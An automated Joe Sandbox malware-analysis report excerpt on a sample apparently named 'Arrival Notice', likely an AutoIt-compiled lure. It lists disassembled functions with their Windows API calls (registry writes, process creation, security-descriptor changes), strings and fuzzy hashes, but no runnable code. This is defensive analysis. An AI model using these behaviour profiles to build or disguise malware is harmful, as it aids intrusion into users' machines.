                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                  • String ID: AutoIt v3 GUI
                  • API String ID: 1458621304-248962490
                  • Opcode ID: eb52daf9777005321e29175d0f386e6eafff15a83ecd7a6ab8cc88589d226de3
                  • Instruction ID: d56baf53b975fe34f45f585930d2b5f512eac6c4ad67f66965ff8bb23b601afd
                  • Opcode Fuzzy Hash: eb52daf9777005321e29175d0f386e6eafff15a83ecd7a6ab8cc88589d226de3
                  • Instruction Fuzzy Hash: 3CB18075600209AFDB15DF68CC85FAE3BB5FB48314F15422AFA05E7290DB34A941CB58
                  APIs
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00411114
                    • Part of subcall function 004110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411120
                    • Part of subcall function 004110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 0041112F
                    • Part of subcall function 004110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411136
                    • Part of subcall function 004110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041114D
                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00410DF5
                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00410E29
                  • GetLengthSid.ADVAPI32(?), ref: 00410E40
                  • GetAce.ADVAPI32(?,00000000,?), ref: 00410E7A
                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00410E96
                  • GetLengthSid.ADVAPI32(?), ref: 00410EAD
                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00410EB5
                  • HeapAlloc.KERNEL32(00000000), ref: 00410EBC
                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00410EDD
                  • CopySid.ADVAPI32(00000000), ref: 00410EE4
                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00410F13
                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00410F35
                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00410F47
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410F6E
                  • HeapFree.KERNEL32(00000000), ref: 00410F75
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410F7E
                  • HeapFree.KERNEL32(00000000), ref: 00410F85
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410F8E
                  • HeapFree.KERNEL32(00000000), ref: 00410F95
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00410FA1
                  • HeapFree.KERNEL32(00000000), ref: 00410FA8
                    • Part of subcall function 00411193: GetProcessHeap.KERNEL32(00000008,00410BB1,?,00000000,?,00410BB1,?), ref: 004111A1
                    • Part of subcall function 00411193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00410BB1,?), ref: 004111A8
                    • Part of subcall function 00411193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00410BB1,?), ref: 004111B7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                  • String ID:
                  • API String ID: 4175595110-0
                  • Opcode ID: 9962e428fe9b9e884370411c14ce3de91c9cd2b6699430234bd0c34a21a8b073
                  • Instruction ID: 3bb704898f3d1ba496866a42cbedfd77a73e0a0bee144f91acd4345967510d4b
                  • Opcode Fuzzy Hash: 9962e428fe9b9e884370411c14ce3de91c9cd2b6699430234bd0c34a21a8b073
                  • Instruction Fuzzy Hash: B1718F7590120AEBDF209FA5DC45FEFBBB8BF05300F044126F919A6291D7B4D986CB68
                  APIs
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043C4BD
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044CC08,00000000,?,00000000,?,?), ref: 0043C544
                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0043C5A4
                  • _wcslen.LIBCMT ref: 0043C5F4
                  • _wcslen.LIBCMT ref: 0043C66F
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0043C6B2
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0043C7C1
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0043C84D
                  • RegCloseKey.ADVAPI32(?), ref: 0043C881
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043C88E
                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0043C960
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                  • API String ID: 9721498-966354055
                  • Opcode ID: 24f44d659b00a7572c2fd5fd2af82fd94f2e9f47d9392fa52a1d9232e19e8c5a
                  • Instruction ID: d1107b04bf85d0c9dc81a4dcf9d8b28cdeca4588113591d3782323f37698d029
                  • Opcode Fuzzy Hash: 24f44d659b00a7572c2fd5fd2af82fd94f2e9f47d9392fa52a1d9232e19e8c5a
                  • Instruction Fuzzy Hash: DC128A352042019FC715DF14C881B6AB7E5EF89718F14889EF98AAB7A2DB35FD01CB85
                  APIs
                  • CharUpperBuffW.USER32(?,?), ref: 004409C6
                  • _wcslen.LIBCMT ref: 00440A01
                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00440A54
                  • _wcslen.LIBCMT ref: 00440A8A
                  • _wcslen.LIBCMT ref: 00440B06
                  • _wcslen.LIBCMT ref: 00440B81
                    • Part of subcall function 003CF9F2: _wcslen.LIBCMT ref: 003CF9FD
                    • Part of subcall function 00412BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00412BFA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$MessageSend$BuffCharUpper
                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                  • API String ID: 1103490817-4258414348
                  • Opcode ID: b93541e53098846d0c764eacf2c87218551ac02d088308ad9da5f3eefc49ba9a
                  • Instruction ID: b858df297180d3eb3e5d9cd2db5723e2eb8c77b98687b6e9409c8c07d0b96bdc
                  • Opcode Fuzzy Hash: b93541e53098846d0c764eacf2c87218551ac02d088308ad9da5f3eefc49ba9a
                  • Instruction Fuzzy Hash: 0BE1F2312083018FC714DF24C45196AB7E1FF98308F14895EF99AAB762D738ED56CB8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                  • API String ID: 1256254125-909552448
                  • Opcode ID: 597bae2c14bba70fb4ab405f6e2a3fb6b564fcf76c936097875f26c16e598f8b
                  • Instruction ID: ad45dffe594e05d2618a350962c87873383182a6d0d917edbb5b1270a8b98182
                  • Opcode Fuzzy Hash: 597bae2c14bba70fb4ab405f6e2a3fb6b564fcf76c936097875f26c16e598f8b
                  • Instruction Fuzzy Hash: A171F53360012A8BCB10EE68DC916FB33919B68754F21612BE865BB384E739DD458399
                  APIs
                  • _wcslen.LIBCMT ref: 0044835A
                  • _wcslen.LIBCMT ref: 0044836E
                  • _wcslen.LIBCMT ref: 00448391
                  • _wcslen.LIBCMT ref: 004483B4
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004483F2
                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0044361A,?), ref: 0044844E
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00448487
                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004484CA
                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00448501
                  • FreeLibrary.KERNEL32(?), ref: 0044850D
                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0044851D
                  • DestroyIcon.USER32(?), ref: 0044852C
                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00448549
                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00448555
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                  • String ID: .dll$.exe$.icl
                  • API String ID: 799131459-1154884017
                  • Opcode ID: 8dde8f2a8b2f0a3ac9063408b333719997d50d640b9f5c4734fafcf049e6ae89
                  • Instruction ID: 853d03a969eeed0c7165d102e7f8d0d6f153d4c7f06d26ba085810a04b80b34c
                  • Opcode Fuzzy Hash: 8dde8f2a8b2f0a3ac9063408b333719997d50d640b9f5c4734fafcf049e6ae89
                  • Instruction Fuzzy Hash: D761F171900215BBFB14CF64DC81BFF77A8BB04B11F10461AF915DA2D1EB78AA80CBA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                  • API String ID: 0-1645009161
                  • Opcode ID: 946fb804a9827832f921f5489139c918ab885c5f29ba7d1ff0d04980136efb82
                  • Instruction ID: 7fab878516d08c4ee19de0f64af3d4a1754848020a21d4dc84bb2911c89c63f7
                  • Opcode Fuzzy Hash: 946fb804a9827832f921f5489139c918ab885c5f29ba7d1ff0d04980136efb82
                  • Instruction Fuzzy Hash: 8F81E271A00209BBDB22AF60DC43FFA37A9EF55304F154026FB05AE592EB75AA11D790
                  APIs
                  • LoadIconW.USER32(00000063), ref: 00415A2E
                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00415A40
                  • SetWindowTextW.USER32(?,?), ref: 00415A57
                  • GetDlgItem.USER32(?,000003EA), ref: 00415A6C
                  • SetWindowTextW.USER32(00000000,?), ref: 00415A72
                  • GetDlgItem.USER32(?,000003E9), ref: 00415A82
                  • SetWindowTextW.USER32(00000000,?), ref: 00415A88
                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00415AA9
                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00415AC3
                  • GetWindowRect.USER32(?,?), ref: 00415ACC
                  • _wcslen.LIBCMT ref: 00415B33
                  • SetWindowTextW.USER32(?,?), ref: 00415B6F
                  • GetDesktopWindow.USER32 ref: 00415B75
                  • GetWindowRect.USER32(00000000), ref: 00415B7C
                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00415BD3
                  • GetClientRect.USER32(?,?), ref: 00415BE0
                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00415C05
                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00415C2F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                  • String ID:
                  • API String ID: 895679908-0
                  • Opcode ID: 74bc363e33b68157d9cc49e9248c239a9b4d52831ec64c4219990c888fc6b316
                  • Instruction ID: cc04c5a136c903036512c9b13869d5661c610421654299a09eee57ca4209f4f2
                  • Opcode Fuzzy Hash: 74bc363e33b68157d9cc49e9248c239a9b4d52831ec64c4219990c888fc6b316
                  • Instruction Fuzzy Hash: 47718F31900B05DFDB20DFA9CE85AEEBBF5FF88704F144529E542A26A0D775B940CB58
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[G
                  • API String ID: 176396367-143033165
                  • Opcode ID: 919a2f1029db8d7a294bd87cbe820f2f45d2dbb2561d5d2fd1a8b1498633f905
                  • Instruction ID: 5e5532ab242e250a8425d4c998ed9ac13062ac478c07258deb8741e84e5a104a
                  • Opcode Fuzzy Hash: 919a2f1029db8d7a294bd87cbe820f2f45d2dbb2561d5d2fd1a8b1498633f905
                  • Instruction Fuzzy Hash: C6E1F432A00516ABCB15DF78C851BEEBBB5BF04711F24812BE456EB340DB38AEC58794
                  APIs
                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003D00C6
                    • Part of subcall function 003D00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0048070C,00000FA0,59887FBB,?,?,?,?,003F23B3,000000FF), ref: 003D011C
                    • Part of subcall function 003D00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003F23B3,000000FF), ref: 003D0127
                    • Part of subcall function 003D00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003F23B3,000000FF), ref: 003D0138
                    • Part of subcall function 003D00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003D014E
                    • Part of subcall function 003D00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003D015C
                    • Part of subcall function 003D00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003D016A
                    • Part of subcall function 003D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003D0195
                    • Part of subcall function 003D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003D01A0
                  • ___scrt_fastfail.LIBCMT ref: 003D00E7
                    • Part of subcall function 003D00A3: __onexit.LIBCMT ref: 003D00A9
                  Strings
                  • SleepConditionVariableCS, xrefs: 003D0154
                  • WakeAllConditionVariable, xrefs: 003D0162
                  • InitializeConditionVariable, xrefs: 003D0148
                  • kernel32.dll, xrefs: 003D0133
                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003D0122
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                  • API String ID: 66158676-1714406822
                  • Opcode ID: bc72fa33678e38fba43ab146baea29b284db4d5aaef3c18de4ff3d207cb9a9db
                  • Instruction ID: 68b36fa1dd2ea7016a8520bf8ec2e7d81c7bbd86c2f343948f704e9a31623a75
                  • Opcode Fuzzy Hash: bc72fa33678e38fba43ab146baea29b284db4d5aaef3c18de4ff3d207cb9a9db
                  • Instruction Fuzzy Hash: FC214637A013106BE7566BB4BC46B6E3394EB05F51F15053BF802E6391DB749C008B98
                  APIs
                  • CharLowerBuffW.USER32(00000000,00000000,0044CC08), ref: 00424527
                  • _wcslen.LIBCMT ref: 0042453B
                  • _wcslen.LIBCMT ref: 00424599
                  • _wcslen.LIBCMT ref: 004245F4
                  • _wcslen.LIBCMT ref: 0042463F
                  • _wcslen.LIBCMT ref: 004246A7
                    • Part of subcall function 003CF9F2: _wcslen.LIBCMT ref: 003CF9FD
                  • GetDriveTypeW.KERNEL32(?,00476BF0,00000061), ref: 00424743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharDriveLowerType
                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                  • API String ID: 2055661098-1000479233
                  • Opcode ID: 7a4004d4b2ed3360db04da4aa590d98bfa63b421adffc2e5d13f5696b96eabc8
                  • Instruction ID: 89486c85f32388680e60e7d199b7df89a84323dda6c298e18f43adbbd4277b22
                  • Opcode Fuzzy Hash: 7a4004d4b2ed3360db04da4aa590d98bfa63b421adffc2e5d13f5696b96eabc8
                  • Instruction Fuzzy Hash: 1CB1F0316083229BC710DF28E890A6BB7E5EFE5724F90891EF196C7391D738D885CA56
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • DragQueryPoint.SHELL32(?,?), ref: 00449147
                    • Part of subcall function 00447674: ClientToScreen.USER32(?,?), ref: 0044769A
                    • Part of subcall function 00447674: GetWindowRect.USER32(?,?), ref: 00447710
                    • Part of subcall function 00447674: PtInRect.USER32(?,?,00448B89), ref: 00447720
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004491B0
                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004491BB
                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004491DE
                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00449225
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0044923E
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00449255
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00449277
                  • DragFinish.SHELL32(?), ref: 0044927E
                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00449371
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#H
                  • API String ID: 221274066-139388415
                  • Opcode ID: 70beec3ddfa39b8c02e29000a922804ccd3d8bc0f65f590a2ba7275153db3d68
                  • Instruction ID: 10abd8b6bdddb4ec7adc850bac50b3488575e7d534a6a1a98a7e241bf1bff564
                  • Opcode Fuzzy Hash: 70beec3ddfa39b8c02e29000a922804ccd3d8bc0f65f590a2ba7275153db3d68
                  • Instruction Fuzzy Hash: 74618871108300AFD701EF60DC85EAFBBE8EF89754F00092EFA95971A0DB709A09CB56
                  APIs
                  • _wcslen.LIBCMT ref: 0043B198
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043B1B0
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043B1D4
                  • _wcslen.LIBCMT ref: 0043B200
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043B214
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043B236
                  • _wcslen.LIBCMT ref: 0043B332
                    • Part of subcall function 004205A7: GetStdHandle.KERNEL32(000000F6), ref: 004205C6
                  • _wcslen.LIBCMT ref: 0043B34B
                  • _wcslen.LIBCMT ref: 0043B366
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043B3B6
                  • GetLastError.KERNEL32(00000000), ref: 0043B407
                  • CloseHandle.KERNEL32(?), ref: 0043B439
                  • CloseHandle.KERNEL32(00000000), ref: 0043B44A
                  • CloseHandle.KERNEL32(00000000), ref: 0043B45C
                  • CloseHandle.KERNEL32(00000000), ref: 0043B46E
                  • CloseHandle.KERNEL32(?), ref: 0043B4E3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                  • String ID:
                  • API String ID: 2178637699-0
                  • Opcode ID: dc3b31b5c5764157022b37278bc8a7ecb8027e275ac7636d897c0ec203a84134
                  • Instruction ID: cb683fb298344cdccad001e077098ecc9d516ad1dd280d490a68d7a3d79fbb9a
                  • Opcode Fuzzy Hash: dc3b31b5c5764157022b37278bc8a7ecb8027e275ac7636d897c0ec203a84134
                  • Instruction Fuzzy Hash: D6F17B316042009FC725EF24C891B6BBBE5EF89314F14855EFA958F2A2CB35EC45CB96
                  APIs
                  • GetMenuItemCount.USER32(00481990), ref: 003F2F8D
                  • GetMenuItemCount.USER32(00481990), ref: 003F303D
                  • GetCursorPos.USER32(?), ref: 003F3081
                  • SetForegroundWindow.USER32(00000000), ref: 003F308A
                  • TrackPopupMenuEx.USER32(00481990,00000000,?,00000000,00000000,00000000), ref: 003F309D
                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003F30A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                  • String ID: 0
                  • API String ID: 36266755-4108050209
